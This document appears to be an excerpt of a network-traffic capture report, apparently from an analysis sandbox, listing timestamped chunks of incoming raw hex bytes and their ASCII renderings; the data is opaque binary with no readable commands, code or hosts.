                                                                                                                                                2022-09-29 12:51:54 UTC31930INData Raw: b3 16 cc fa a2 59 34 90 44 d5 e2 9d f1 16 c1 85 a6 af 11 55 a9 82 9a 7c 48 ad 25 cb 9f 9a e8 7e fa 10 b1 a1 14 15 5f 1f 6a dc 7d 55 db 19 70 3a 8d ba ff 36 f7 1c 8f 14 f9 2d f6 e9 70 f0 58 fb 7a 3f 6f 7d ea 7e 86 fc 94 5a 6d f8 40 85 59 03 f4 13 c1 cf fe e1 be b4 ac 27 1b 4b c3 60 5f 3b f5 98 fa b8 21 a4 ab a6 ad 3a 6a 8f 30 8e fd 8e 42 07 31 60 e7 6b 4b b3 a1 13 41 e0 2b c6 d8 39 da 4a 62 14 2a 6d 02 60 48 08 66 7f 92 0f 87 ef 80 dc 74 61 91 4a fb ff d7 05 a4 c4 1e 4b 3e c5 44 9e 86 69 06 96 be c9 b1 1b 52 0e 78 a3 7b 9c af ee de fe e3 ca 7c cb 18 e0 6e c3 58 e3 41 b6 f7 7e f4 e5 3a d8 92 a8 30 be 34 0c 18 d4 a3 17 9d 4f 0f fc c7 d0 f5 9d 58 d5 1f 01 03 d5 6b 85 26 40 9e 6d 15 b2 9e 07 d5 82 13 4a 50 03 9b c8 85 ca 91 26 39 d5 0f 4c f1 79 f8 a4 a5 fc a2
                                                                                                                                                Data Ascii: Y4DU|H%~_j}Up:6-pXz?o}~Zm@Y'K`_;!:j0B1`kKA+9Jb*m`HftaJK>DiRx{|nXA~:04OXk&@mJP&9Ly
                                                                                                                                                2022-09-29 12:51:54 UTC31931INData Raw: c4 71 a3 95 a1 71 27 0b eb d7 7f 2c 39 7e 4d 3b 20 73 56 1e 5a 36 b0 88 3d 11 9f ea fb 3e 3d 26 c3 f5 a7 34 d4 30 6b c0 42 ec 8e c3 42 d0 09 c0 e4 17 45 96 0f ed 4c 78 22 b8 58 59 90 90 9b f1 42 f1 96 4b f3 ba 98 fc dd 2b 14 27 bb 26 47 79 13 97 a4 de 05 e3 f9 0a 64 a8 34 79 49 05 e8 25 cf 79 1e e3 79 6b 7b b4 fa db 69 66 e0 de 81 07 cb 0c 97 af e9 27 96 cd 7e 1e da a0 44 7e cc 18 0a 47 a6 31 24 16 8b b6 1b e7 68 ac 54 5e cf 39 ac 9e de 59 ef 85 1e 00 68 6f cb ce f4 d6 d1 95 8d ba e3 4d b4 94 9a 33 95 17 ee d3 16 13 16 b9 2b 68 b2 fb 82 1c 37 6d 53 54 ab 2a 9f 46 6b 21 dd 6f 5d b9 8a 53 72 6b d8 96 fa a9 f6 f6 54 a8 15 47 81 3f d7 15 61 f8 9c c3 5d 28 09 cf d9 95 95 c2 42 21 48 0c c8 d8 98 af 25 e3 f6 3f c2 10 c1 a7 b8 47 49 3e 8d 3d 64 bb 2c 92 26 ce e0
                                                                                                                                                Data Ascii: qq',9~M; sVZ6=>=&40kBBELx"XYBK+'&Gyd4yI%yyk{if'~D~G1$hT^9YhoM3+h7mST*Fk!o]SrkTG?a](B!H%?GI>=d,&
                                                                                                                                                2022-09-29 12:51:54 UTC31932INData Raw: 35 53 66 ad 92 52 f7 75 3b a7 73 e5 45 98 d7 d6 a0 0a 29 31 bd e7 4a c1 2e c5 82 6f 07 ab 4b b9 a4 60 3a ba 46 d0 2f b1 cf 13 40 9d 21 10 71 2e b2 30 d8 e5 33 50 f9 f9 2f 8c 9e ae bd 8e ec ef f6 79 ae 49 51 08 ea 15 7f 8e fb 5b d7 5f 08 9c 3a 68 43 24 a5 ab 99 0d 15 70 fb 4f 31 f6 47 39 d2 95 9a a8 83 d0 04 f6 32 a1 f6 e0 5e 00 5f 87 82 4c bc 89 b1 4b 88 6c e5 0e 26 a2 51 32 3b a2 09 ca 5f e8 3e 2c ea 8f 32 d8 b5 54 b5 ee 58 dc 07 cb 9f ef 35 50 9e ee 2e 0d 16 b8 f9 38 07 ba c3 cb 38 47 3c 06 3b a0 35 11 eb 01 41 28 5b 18 6e 5c e6 a3 45 d3 72 03 16 24 6e 23 15 08 99 da 91 e9 31 a9 e2 dc ca 21 48 7f 9a 35 ad 84 7d e5 9b 9a 72 16 bb 8c b1 dc 68 22 c7 25 3e 1e f3 fa ba b8 25 bf 0c 4c 57 03 d1 84 c2 9e dd 09 d2 d3 ce db e7 14 49 5c ce d7 8e 60 43 d5 a9 a9 3a
                                                                                                                                                Data Ascii: 5SfRu;sE)1J.oK`:F/@!q.03P/yIQ[_:hC$pO1G92^_LKl&Q2;_>,2TX5P.88G<;5A([n\Er$n#1!H5}rh"%>%LWI\`C:
                                                                                                                                                2022-09-29 12:51:54 UTC31948INData Raw: a0 08 57 b5 23 77 d9 14 79 fe 73 14 c1 14 1f d4 7e 9b cc 0a 46 6d 65 92 9b ec f2 b4 8b a6 91 dd 93 57 51 1a 08 3b 0f c4 7f 70 3f b0 ca 85 dd dd 8f 4f 3e 42 f0 35 58 26 75 94 3b 37 de 18 b9 1c 34 29 c0 b2 50 d4 ac e3 48 92 49 87 5a 26 03 45 c5 a2 33 d2 fe 38 a3 cb 46 25 87 64 d9 67 7a bf 49 b9 c9 8e a3 7f cd 01 32 70 df c6 a1 96 b7 d0 f7 2f cd da 1a 03 68 4f 26 54 af 16 f0 fc 42 13 b3 c6 0f 3d 79 22 a5 94 0d f3 bd 9a 4a 50 07 42 93 fe cb 10 b6 1c 6a 6a 42 6e 26 52 86 fa 55 d4 ad 33 0f 0f 6f 42 da 5c 1b 03 05 bf 64 63 61 97 2b 04 d9 ef 61 c9 05 08 6a 71 b2 0b 41 ea 79 cd ee a5 40 11 ce 05 81 b9 00 3a 03 d8 b5 d6 8e 70 ab d6 eb 9c e3 83 f2 1e 8d b1 9b 16 01 8c 95 8f 09 39 4a 69 d0 73 97 d0 24 cd 8e 94 64 f4 e9 a7 29 cd e8 47 00 9e 02 b9 26 51 47 d1 01 54 f6
                                                                                                                                                Data Ascii: W#wys~FmeWQ;p?O>B5X&u;74)PHIZ&E38F%dgzI2p/hO&TB=y"JPBjjBn&RU3oB\dca+ajqAy@:p9Jis$d)G&QGT
                                                                                                                                                2022-09-29 12:51:54 UTC31964INData Raw: f0 b0 85 84 58 73 f1 5e 9b f3 3d 73 25 39 22 d3 0f 4e 27 30 86 3e 58 e7 f2 64 31 4a 93 4c a8 16 b4 9a 3c 5e 4a 2c e2 a6 de 5d b2 d7 20 af 71 cc 62 87 32 76 4f a1 ff bc 9b 72 b0 f0 20 fe f3 87 42 19 b7 42 fe 4f 8b 05 f4 ec 63 a1 7c 47 e2 75 99 76 6f a1 3c 03 98 51 90 6f e2 64 cc c7 c4 4b ea bc d7 07 48 fb 84 fb 07 83 bd a7 0f 75 b1 13 03 16 a5 74 1e 27 14 b2 bd 1d 58 c7 41 b4 1b d8 6a f6 a0 78 aa 28 99 10 58 19 90 35 fe 6d db 34 20 87 82 71 60 5f 3e 3a 3d 49 73 9a 74 9c 29 02 d7 55 14 c9 e5 e2 47 d8 3a f0 8f 1c 2f 29 87 9c c5 9d 20 80 2d d6 41 67 0c df cc 77 35 64 8b a7 fb e9 e7 e4 e6 40 b6 e0 d1 2c 35 1c 63 ff ee e6 2a f1 0d cc c1 f8 67 84 6f 28 66 4a 6f c6 23 dd 85 5b 5c 7c 06 8b 57 17 1a 7c 31 7c a7 0e 46 1b 38 d7 61 35 d7 7f f2 4f d9 3a 6e 18 0f 9b 3e
                                                                                                                                                Data Ascii: Xs^=s%9"N'0>Xd1JL<^J,] qb2vOr BBOc|Guvo<QodKHut'XAjx(X5m4 q`_>:=Ist)UG:/) -Agw5d@,5c*go(fJo#[\|W|1|F8a5O:n>
                                                                                                                                                2022-09-29 12:51:54 UTC31980INData Raw: 3f f0 a5 18 cf c9 50 7f c8 1b d9 e9 67 dc e3 e8 50 bc e0 cc e7 25 f7 97 40 0b c7 b4 e5 33 ab 08 54 4a 3c a5 41 aa 48 7d 96 39 1a 21 00 8b 63 66 6c 66 b7 a0 38 07 5c 59 79 c1 a2 68 20 3d 8f 1c 8b b5 80 fc 0e 00 88 28 d9 6d c5 7a ef da 47 19 ea c1 27 d5 93 2a 9f 68 48 b6 ee 3a 33 dd c6 44 d3 ca d7 55 b4 3f b6 15 f9 88 62 4d 42 01 34 36 ef 86 07 11 f1 07 e4 f1 48 6a 91 5c 9f a3 06 61 7a bc d9 a4 e7 c8 24 6b d3 37 78 de 0d 0a 1d 11 91 6a 60 42 eb a5 ad ab 2a ff 89 7b ab cc 2c b2 95 77 a4 15 c5 c7 e9 0f 5e 4a 3e 3c bd 55 16 17 04 0d 58 e0 74 e5 13 ba cf 34 53 86 4b f3 0a 26 59 c9 2e 88 41 5e d2 46 e8 42 ba 26 d7 6f 59 60 73 d0 91 90 09 f0 a6 82 fe ae 60 f5 da 15 04 f1 5a be 71 e2 5c 56 25 ca ca 6f 5f 38 43 d6 d8 f2 31 72 8f 40 a6 22 ba 8b 1d 83 7a 92 d8 5f 3a
                                                                                                                                                Data Ascii: ?PgP%@3TJ<AH}9!cflf8\Yyh =(mzG'*hH:3DU?bMB46Hj\az$k7xj`B*{,w^J><UXt4SK&Y.A^FB&oY`s`Zq\V%o_8C1r@"z_:
                                                                                                                                                2022-09-29 12:51:54 UTC31996INData Raw: 7a 9f 54 a7 c9 da cc a0 ec 67 78 26 bb 63 15 d8 87 d9 f3 7b 38 bf b6 21 5e fd d6 51 4e d4 e5 86 db f8 c4 74 e5 0d e0 56 db 68 05 3d c5 76 01 fb f7 a3 b6 4b cb 7a 0d fe c3 1a cb 41 90 30 44 c9 6e 9b 35 63 7f fd 8b 69 65 c7 28 09 08 4c c4 23 8f 64 59 dd e2 85 fc 42 5b 3e 29 0d 7f 31 48 bf 37 0a c7 db 25 d1 19 c4 c8 44 41 a9 9c 82 5a 1d a7 24 59 cd d0 4c 15 34 de 54 c2 f2 30 88 d4 da 80 be c3 8d f3 0f 4d 18 19 88 75 5d 8e 3b 5c d0 d7 a6 ad fd 66 4a 3d f1 01 c9 94 d7 a2 3a a2 3c 70 6b 4a 05 f8 2f 15 72 f0 e6 b8 56 1d 81 f6 ee 51 23 3e 73 32 80 2f ee 6f 5b b3 41 75 c4 f2 42 c6 0d 2b 40 ac 54 c6 c6 f8 12 c0 db 4b 20 4b 02 ea a0 f6 9b 17 35 a8 57 3d 1f 9d 59 e8 9c 25 a2 0b b3 16 b8 70 71 60 50 ea e3 f1 87 cb 2f f0 57 6b 68 ca f5 a0 ce 1e 31 72 26 78 f7 85 03 ef
                                                                                                                                                Data Ascii: zTgx&c{8!^QNtVh=vKzA0Dn5cie(L#dYB[>)1H7%DAZ$YL4T0Mu];\fJ=:<pkJ/rVQ#>s2/o[AuB+@TK K5W=Y%pq`P/Wkh1r&x
                                                                                                                                                2022-09-29 12:51:54 UTC32012INData Raw: f0 f6 ab 69 ee 0e 83 ad 7f 96 a2 ba 95 59 c7 cb a0 34 58 64 8f f9 06 bb a7 e0 33 6a a6 34 fa 8a 78 d9 f8 2b fb 45 32 cc 2f 2c 6b f0 ca 00 91 39 da 4b 23 10 0e f6 76 3e 7a 19 c7 dc a6 2a ec aa 9d 41 0c 5d 96 28 b6 77 dd 1f 21 b1 48 a6 a2 51 20 46 97 2c 44 9f b7 ff 3d 64 76 ea 23 72 49 ab e5 8b 53 5e a1 19 c9 f7 ec f4 0f 5e f6 90 9f 28 5e 17 d1 ab a6 11 93 52 3f 31 26 bc fa 57 b9 e9 74 7a 38 c1 9f 9d dd ed 19 32 d1 1d a6 50 de f9 28 24 3c c7 e7 29 97 07 e0 c7 fb e2 bf 8a 35 42 62 97 9e 01 df 33 ac 42 67 1d 3c 3b c4 47 66 3b 20 f4 13 6e e1 d1 05 bc c1 16 0f 24 90 1e 2f 4e 03 87 7e 19 99 8f ba 1e 1d 6f b0 a8 17 2a fc 49 c8 7b 7f a7 47 01 98 6b ef 22 52 97 58 be 96 ba 65 14 24 8a db 1a 59 b3 7c 8c 51 d9 6b b0 96 a9 28 c8 78 6f ab f2 b8 8a 41 c2 dc e6 f0 64 94
                                                                                                                                                Data Ascii: iY4Xd3j4x+E2/,k9K#v>z*A](w!HQ F,D=dv#rIS^^(^R?1&Wtz82P($<)5Bb3Bg<;Gf; n$/N~o*I{Gk"RXe$Y|Qk(xoAd
                                                                                                                                                2022-09-29 12:51:54 UTC32028INData Raw: fa a9 12 40 03 6e 72 22 58 1e 6b 4f 2e 4b 83 cb c8 22 55 8c 06 12 dd 86 c6 eb 7a ca d2 6b 06 3c 15 85 b1 5b 5a 22 f1 84 a4 d5 c9 b4 30 24 87 bc 28 db 34 f7 4c 02 b1 51 58 81 cc b8 09 1c c2 8c 35 c5 7c 56 ab 66 86 98 bb 39 be 91 2b a5 e1 7d d7 45 3d d3 ac b8 ef 1c 31 b0 7f 1f 8b 80 1f 9a d8 22 b9 64 b8 aa 0f 2a e6 61 cc 58 f5 e6 53 75 4c 17 00 42 78 73 d2 06 bb 00 cf d7 43 03 da 58 fd 5b ab 20 d8 b1 54 6a b4 94 75 c5 a1 25 47 22 97 7c b9 ab 41 6c a2 49 5e f6 b9 13 30 c2 5b 2a 6a 59 55 49 1b 49 1e 02 5c 0f ed a8 8a 34 ab 6e 5c c9 4c 31 b3 de 21 e9 ce 49 80 79 3c b9 ce 80 fd d3 58 9c ae bf b2 46 08 59 5e 76 66 87 7b 0c cc 3f 94 49 08 60 02 91 1a 3d d2 31 28 4c 98 06 8a 58 57 4a 05 06 9b 20 18 bb 59 e0 5a b3 49 d8 bd 79 1f 5d 4e c3 33 6b 9d 32 d8 55 fb 61 2a
                                                                                                                                                Data Ascii: @nr"XkO.K"Uzk<[Z"0$(4LQX5|Vf9+}E=1"d*aXSuLBxsCX[ Tju%G"|AlI^0[*jYUII\4n\L1!Iy<XFY^vf{?I`=1(LXWJ YZIy]N3k2Ua*
                                                                                                                                                2022-09-29 12:51:54 UTC32044INData Raw: 4a fe 2e 6b 8d 25 96 cf 61 a5 43 54 55 c3 58 2b d8 fa 4e 2e b9 30 e8 79 29 28 aa fb 3f f8 d6 5a 2b 90 61 fd 8b 92 c6 d6 df 06 17 40 db a5 3c cc 32 64 cc 4d f2 74 c6 a9 f3 a5 dd 81 1f f4 01 0f f2 c0 74 e3 d6 3c c4 10 01 3e 7d b2 54 60 b5 bb 7c 8c 20 8a 51 c8 8a bd c3 40 43 ad 34 7e 55 ce 78 af 40 10 aa 75 75 3a 8e 7b 61 94 b3 2e be b5 4b ec 6c 72 de 15 cf 10 c8 bc 6b b7 6b ba 7f 35 09 7b eb 2e 56 84 95 91 7d 8d 24 90 8a db e9 17 a2 1c c6 b4 75 15 71 d0 60 f2 18 42 d9 66 7c 58 8d 20 bf 80 51 02 3b 5b 6e 67 db 05 eb 6f c7 94 b4 2d bc b2 6c ef 62 9c d6 cc a1 9e 6f e4 33 e6 e1 a5 25 98 22 7f b4 db 9b d2 26 e4 a7 d9 ed 9d f4 ca 91 05 e5 be e0 cd 93 e5 b9 7e cf 1e 6e 72 22 c9 d0 c9 a0 85 31 21 c8 1b 16 b5 46 61 9d 1c 93 9c ff 00 07 58 c0 2b 02 8a 56 69 79 40 08
                                                                                                                                                Data Ascii: J.k%aCTUX+N.0y)(?Z+a@<2dMtt<>}T`| Q@C4~Ux@uu:{a.Klrkk5{.V}$uq`Bf|X Q;[ngo-lbo3%"&~nr"1!FaX+Viy@
                                                                                                                                                2022-09-29 12:51:54 UTC32060INData Raw: 28 b0 69 74 22 ae 5e 35 92 0e eb 6b 94 d8 8c ea 47 4d b1 e7 6f 30 bb 26 e7 a6 6d 01 67 c0 3d 1c 45 09 07 f4 51 6f b3 41 1c 96 0a d6 7f 7d 28 36 21 c3 b1 6e 59 f5 88 9b 61 57 6a e6 b0 7c ca 7e bf 88 35 1a 2c 31 49 e0 78 5f 57 f7 fb d3 cc 79 48 07 51 5c a2 68 fa 3e f4 e0 ea f1 a6 af ba 27 71 43 39 6f ea ac c8 44 ab 91 42 c1 32 f0 d9 27 87 33 b1 cc d2 10 1d a4 00 bc fd 08 8f b4 73 aa 15 df 13 ae b7 3a e0 1e 5f 49 78 c6 9f 25 bf 62 ce 78 f5 c9 a8 f4 35 0e 67 d7 c3 ca 41 ac 49 0d af c2 ea 9c 21 e2 7f 87 ef d5 f5 e5 df a9 86 c7 f4 9d 8d 36 f8 ef b7 d3 d4 17 05 c9 f6 88 da 85 1e e6 3f 46 09 20 e4 29 f8 7c c3 77 9d 59 f0 e6 e1 05 f4 04 48 67 87 52 56 d1 f8 17 c7 23 22 cc d5 8d 11 1a a3 3c be 0d 38 cf cb 75 5c c1 ff 8f 13 92 96 98 98 56 8a ee be a9 23 34 1a a2 e4
                                                                                                                                                Data Ascii: (it"^5kGMo0&mg=EQoA}(6!nYaWj|~5,1Ix_WyHQ\h>'qC9oDB2'3s:_Ix%bx5gAI!6?F )|wYHgRV#"<8u\V#4
                                                                                                                                                2022-09-29 12:51:54 UTC32076INData Raw: f3 89 e4 f8 07 62 c8 b5 4c f8 3a 56 03 0a 09 f6 74 7f 2d fb b1 39 74 75 55 ca a1 ca 98 b4 10 85 7d 89 72 e4 72 19 ea 1e 26 5f ec cf e6 e2 ee 76 19 cb 46 e4 53 89 e4 fc e3 60 61 de 85 c4 41 09 bf 66 75 d2 76 aa b7 f5 9e e6 13 9d c9 fa f7 f1 ba 37 a6 8b 24 57 a0 d8 b2 50 20 95 54 96 e8 db 70 88 6f 36 8d fb 4f 53 cc 17 49 d1 f1 ad 2c bf 7b 37 03 8c f4 9f b3 d7 41 2e 83 4a 23 09 b4 d4 ea 99 f7 1b bc ba c8 41 58 d4 55 34 e3 f0 ca 38 1e 66 20 e2 fd 59 bd 8f fb e1 9c 2f 1e 80 5d 97 fb 43 af ab 1e bb 12 a3 ce 13 56 dc 28 ef 07 ee 40 3a 09 fc 5e 44 71 b4 32 4b e7 63 d6 76 c1 c5 a6 ca 4c 59 4e ab 3a 99 f7 43 bf 93 c6 33 51 ab c3 56 58 d1 93 36 51 d2 95 b0 20 32 a6 31 ba dd b5 7b 9b bc 90 f1 36 be e1 4d cb 09 c9 00 6f 1e 66 49 fb 11 9a d0 43 8d c5 1f 54 55 9b a4 7e
                                                                                                                                                Data Ascii: bL:Vt-9tuU}rr&_vFS`aAfuv7$WP Tpo6OSI,{7A.J#AXU48f Y/]CV(@:^Dq2KcvLYN:C3QVX6Q 21{6MofICTU~
                                                                                                                                                2022-09-29 12:51:54 UTC32092INData Raw: f7 0a b0 96 77 2b 8e 93 ef 76 a0 30 e8 80 5a 2e 8b f5 4f 8c 1d 3c ea 85 9f 0d 8a b6 54 04 55 72 b0 42 7f 66 66 d9 23 7a d1 4d ad 4f 34 67 10 03 45 39 8e c1 fc c5 3d dd af 85 26 aa c5 11 50 e4 ef eb f4 46 0a 25 3d 67 64 38 ef b7 81 d0 1d aa 24 0c 75 e7 78 0d f4 e6 77 7c 83 2c 5b ed 53 be ff ed 0c 59 7c e0 03 a6 ae cd 58 c8 f0 2a 66 bf 86 74 14 76 8f 5f 8f 63 67 80 d1 c4 f6 51 1e 14 a8 3d 17 52 d2 6a 9d b1 05 6b 13 57 cd 55 44 9b e0 82 15 68 78 f7 1a d2 f1 75 b4 48 03 c7 d4 d4 d6 d1 bd e3 94 71 fe 37 7f 30 14 6e 62 07 0b 40 b3 f4 13 c0 5c ac 36 17 bb e5 3d 14 33 31 f6 c4 a4 8e 6e 5e 62 da 07 55 6e 43 6d 95 70 85 c7 29 93 fd 85 8f 0c 6f 87 c0 2d b4 20 21 57 fb 55 59 1d eb fa e1 a2 4b f3 94 a9 f9 19 34 89 b7 fa be 1c 59 1b da 4b 08 4a 42 83 54 fe a0 26 e3 4b
                                                                                                                                                Data Ascii: w+v0Z.O<TUrBff#zMO4gE9=&PF%=gd8$uxw|,[SY|X*ftv_cgQ=RjkWUDhxuHq70nb@\6=31n^bUnCmp)o- !WUYK4YKJBT&K
                                                                                                                                                2022-09-29 12:51:54 UTC32108INData Raw: 02 3e e9 44 3a 79 cb fb 9c ec 0f 8a fd c8 44 86 36 78 ec 55 c1 8a 3c bf 09 64 28 4e e8 82 30 e8 2b c4 b0 79 dc a8 9a 11 cc 90 71 ad 94 07 0a 78 5e f9 36 d4 fd 65 34 51 38 e9 ca a8 e8 8b c3 14 a9 8a 72 96 7f f9 95 e4 83 2f c9 fd 2a 7d 40 56 c0 25 42 6e 1c 00 ea 15 b4 b9 b2 82 71 16 fa 43 7d f3 ea 95 e3 97 8e f1 a8 75 44 ef 9e 5e e9 79 57 9d 04 09 19 bf c2 d3 e2 76 a5 99 7b a5 13 6f 62 21 1b c8 c0 87 68 3d 7b 52 f9 93 65 34 bb af a2 3e 65 15 71 9e d8 ed b9 b8 c6 19 26 2f e6 e2 87 f8 5b 80 63 45 32 5f 87 e3 74 7c 55 f5 e2 d4 2e 1b 6d 6a ff 98 33 dc f2 1a d8 6b 9a b6 49 7d 52 ea 81 32 09 94 cc 69 67 71 5b 03 26 10 24 c3 07 fd 13 fa df a4 bd 0b 5a 1f 03 f3 53 b1 e3 6e d4 bf be d7 9c ea ab ef 46 1d 9a c3 fd 88 c5 ba 7f b7 60 11 12 f8 95 65 eb 19 1a d2 76 30 56
                                                                                                                                                Data Ascii: >D:yD6xU<d(N0+yqx^6e4Q8r/*}@V%BnqC}uD^yWv{ob!h={Re4>eq&/[cE2_t|U.mj3kI}R2igq[&$ZSnF`ev0V
                                                                                                                                                2022-09-29 12:51:54 UTC32124INData Raw: e7 92 c4 02 c8 1a 44 60 d3 73 83 bb c3 3a e1 72 b6 fb 5d 54 44 70 1f 1b 28 b1 91 72 c4 27 11 98 c7 54 1f ff aa 0e b2 21 12 84 e0 9d 75 e0 05 bf a1 15 aa 35 9d 11 92 52 3f 21 80 46 04 7a 4e c4 49 00 64 e7 21 70 ab 1a 2e d8 ac 5c 41 4d f8 ec 24 6a 2a f6 9c 98 26 91 c3 5d f7 0a 04 63 21 d1 31 de 92 5e 09 69 1d a7 f7 56 c8 0f 27 34 60 40 00 5a 80 08 e7 93 bf cd e5 e0 c5 4f 91 a1 99 87 6d c9 50 58 ff c0 6c 67 73 96 b7 8b 7d 55 50 02 7d 07 f1 4d f8 a6 65 5e f3 c9 5a c7 6c 1a 62 2d 82 ce 33 51 d5 6f a0 0d 1b d4 e3 eb 55 dd 7b 6a 79 03 d2 a1 c2 d6 74 22 41 f6 78 78 c9 1b e1 0f 09 2f 2a b3 47 cb 22 0b 85 10 bf 0e 8a cd 6c 57 1b 24 65 28 f2 46 f2 e0 5f e8 36 33 09 75 14 94 b0 a7 7a e6 1b 97 21 4e 3f 85 a5 7c b2 b9 29 00 ac a0 ae ff ac 5a 8d 19 0b 83 dd 95 1e d4 9c
                                                                                                                                                Data Ascii: D`s:r]TDp(r'T!u5R?!FzNId!p.\AM$j*&]c!1^iV'4`@ZOmPXlgs}UP}Me^Zlb-3QoU{jyt"Axx/*G"lW$e(F_63uz!N?|)Z
                                                                                                                                                2022-09-29 12:51:54 UTC32140INData Raw: 21 4f 5e 06 46 2a a7 b1 65 93 b4 81 dd a4 d1 c3 dc 55 04 5b c0 2a 74 e2 24 87 df 34 7f 5d 5b a6 82 6b 1c 97 ec 77 0d da 21 af 63 99 fd 92 6e 9d c9 a4 b4 50 12 57 15 fa ae 45 be 92 d8 11 f6 56 30 07 80 67 1c 12 40 1d 6f 1b d5 e3 92 aa 6a bd 46 6b 95 92 b3 fa c5 1a 5e 1b 49 5d 4b c2 06 94 0a e4 07 a7 12 0c 6d 43 67 b2 90 6f b4 a6 1c 0e 56 dd 2d 19 ab 61 ad 2a 76 15 82 7d 12 4b 79 15 73 0a 0e 06 2b a3 26 1c ba 4f 76 f4 e1 52 e7 4c 42 a6 b0 d4 a1 c5 c6 91 27 60 6a b9 07 d0 21 50 f6 57 e3 b3 77 2c 08 f5 25 4c 86 67 3d 0f 51 13 3f 73 e0 b4 1c 6d 97 d2 dd 98 59 86 1d 34 25 d3 40 6b 2f fb 4d 30 51 2a 8a 29 59 05 5c 7e 2d 2c 38 1e 2d a4 26 81 78 e6 6d 91 70 2e f1 aa 43 45 18 9f 4e a3 49 3f ea 0f e9 e6 25 3d b1 60 d2 cc e1 13 33 27 ec ed ea f9 3e 5f 87 02 01 cd 0e
                                                                                                                                                Data Ascii: !O^F*eU[*t$4][kw!cnPWEV0g@ojFk^I]KmCgoV-a*v}Kys+&OvRLB'`j!PWw,%Lg=Q?smY4%@k/M0Q*)Y\~-,8-&xmp.CENI?%=`3'>_
                                                                                                                                                2022-09-29 12:51:54 UTC32156INData Raw: 11 d0 40 b5 9d 16 e5 cb 23 01 8e 4d 55 f3 75 58 cc a4 07 02 99 e4 3a d1 a0 ba cb ba ea d4 d8 a4 f2 f4 56 85 97 8c e2 68 69 3c d2 e5 63 6e 98 dc ec d5 14 a0 1c 8c 3d c4 69 66 cc 72 49 c5 60 43 08 86 9e b7 0f 41 3e b9 df f1 8e 75 1e b9 61 9f 2b ba 9d e2 47 f9 5b 63 21 90 08 1a d6 0d 40 38 29 df f3 98 7f 8d a5 61 26 1d 77 5b d0 e7 f3 35 0d f2 df d6 6e 18 da a1 ab c4 67 02 f0 ef 61 09 7c 0d 7c 83 df ab bd 38 cf 08 52 bd 8d ca 69 d5 6f 02 c0 57 54 41 6e fb aa 7a ba 68 30 b9 75 86 19 2d f5 d8 26 d6 6d 36 7b 5b de af 12 78 a6 bc 0e 1b 72 a2 c4 6e f3 e0 85 60 c4 24 fd fd b8 92 21 1f ef d1 56 81 0b 74 5c d4 cc 04 82 22 8c 8a f7 ff 05 1a b0 4c 77 a4 ff 4e 1f d6 35 f2 43 db c6 a3 41 ac cd bc ff 15 ab bd 33 58 1d f6 0c 89 27 69 58 48 a3 df 9c f7 8d 67 1e 4e 75 e1 a0
                                                                                                                                                Data Ascii: @#MUuX:Vhi<cn=ifrI`CA>ua+G[c!@8)a&w[5nga||8RioWTAnzh0u-&m6{[xrn`$!Vt\"LwN5CA3X'iXHgNu
                                                                                                                                                2022-09-29 12:51:54 UTC32172INData Raw: 79 c5 da 8d 50 b3 ea 56 d1 db 2d 23 32 b1 aa 09 2d 92 ce df 9c c5 11 c6 3e 60 c5 95 46 99 58 35 af ca 89 85 8a cd b0 6b 80 59 00 0c 84 b6 2f bb fe 7f bc c4 08 e3 63 1c a3 c2 3d e0 7e 1e 43 e6 97 12 98 84 79 21 6a e7 89 be df fa ce 33 a0 28 64 f2 06 37 e0 2e e4 b8 b8 c6 27 d9 6d e2 c8 74 38 81 b5 16 3f a5 24 64 3a bd 53 46 3c 50 de a7 98 de 92 5a 39 fa 3e 79 c8 44 8b 68 3e 68 68 41 bb 0d 45 00 30 4b ff de ac cf 47 54 d0 c5 3d 20 f3 f0 35 3a 8e 17 43 e8 0b 44 e6 0c 94 dc 17 7a 23 ac 2e 61 21 fb 13 c3 39 be bc e8 11 d3 fe d7 1a 5a b0 1a d3 d5 7f 54 10 a8 26 6d 49 bf ff 50 3a 30 a7 aa 00 78 0b 9f ca 7e 68 5a 13 a9 c4 e4 8d 72 27 c4 dd 74 7d c4 b7 47 d9 04 ad 0a 39 a2 76 b7 24 b9 9c 07 97 fe 9b 21 64 a9 45 fb 3e de 56 0c 01 0b c9 98 6d 7f 7f 5f 3e f5 4a f4 78
                                                                                                                                                Data Ascii: yPV-#2->`FX5kY/c=~Cy!j3(d7.'mt8?$d:SF<PZ9>yDh>hhAE0KGT= 5:CDz#.a!9ZT&mIP:0x~hZr't}G9v$!dE>Vm_>Jx
                                                                                                                                                2022-09-29 12:51:54 UTC32188INData Raw: 5b 86 57 83 a5 52 c1 84 46 82 b3 13 ab 89 ac 18 7a d3 2b 42 6d e0 39 91 5c 25 c5 dc ec b8 95 6a b9 40 78 f5 ce 77 d6 84 58 88 97 40 35 ee 0c fe 9a e7 27 80 ff 5f 5f d6 9e ed 3a 75 a3 4e be 09 68 3e 72 1f 5d 12 98 67 58 b0 48 cc 79 20 b6 74 b9 de 96 3f d1 fb 52 ff 14 d2 5f 34 06 2c 39 3f ac 50 d3 13 d7 c6 c9 be 2a 33 12 1a 8c b0 7c 52 c6 af 9c 7d 6f 7d bd ca 7c df 50 90 7f 25 e6 10 73 18 31 a4 93 e8 d4 79 be 8c e3 dc a7 ea ea a8 f7 5c cd ad 87 22 78 00 ff f3 3c 05 bd f3 b0 67 ac ea 7b 65 4a 46 57 38 c0 23 42 ce 83 da 8e 7b 1f 9f e9 cc 03 85 50 57 7c 0c 1c 4f 09 98 59 27 43 73 9d a5 5f 08 b0 4d a5 1a e4 3b b5 1f 12 66 d3 92 83 95 53 7b 21 d4 05 b0 48 1e e8 51 29 14 74 c5 0f 64 57 0d 1a 2f 05 87 e2 b3 a1 73 4e 97 e6 d4 fa 09 39 63 88 ad 6e ed c4 cb df a0 f9
                                                                                                                                                Data Ascii: [WRFz+Bm9\%j@xwX@5'__:uNh>r]gXHy t?R_4,9?P*3|R}o}|P%s1y\"x<g{eJFW8#B{PW|OY'Cs_M;fS{!HQ)tdW/sN9cn
